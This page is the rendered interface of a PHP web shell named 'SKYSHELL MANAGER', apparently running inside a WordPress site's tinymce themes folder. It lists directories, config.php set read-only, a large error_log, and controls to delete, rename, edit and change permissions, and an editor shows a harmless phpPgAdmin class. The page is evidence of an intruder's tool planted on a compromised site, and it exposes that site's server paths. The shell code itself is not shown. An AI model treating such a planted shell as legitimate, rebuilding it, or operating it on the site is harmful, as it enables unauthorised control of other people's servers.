📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
41068.9 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: ArrayRecordSet.php
<?php /** * Really simple RecordSet to allow printTable of arrays. * * $Id: ArrayRecordSet.php,v 1.3 2007/01/10 01:46:28 soranzo Exp $ */ class ArrayRecordSet { var $_array; var $_count; var $EOF = false; var $fields; function __construct($data) { $this->_array = $data; $this->_count = count($this->_array); $this->fields = reset($this->_array); if ($this->fields === false) $this->EOF = true; } function recordCount() { return $this->_count; } function moveNext() { $this->fields = next($this->_array); if ($this->fields === false) $this->EOF = true; } } ?>
Save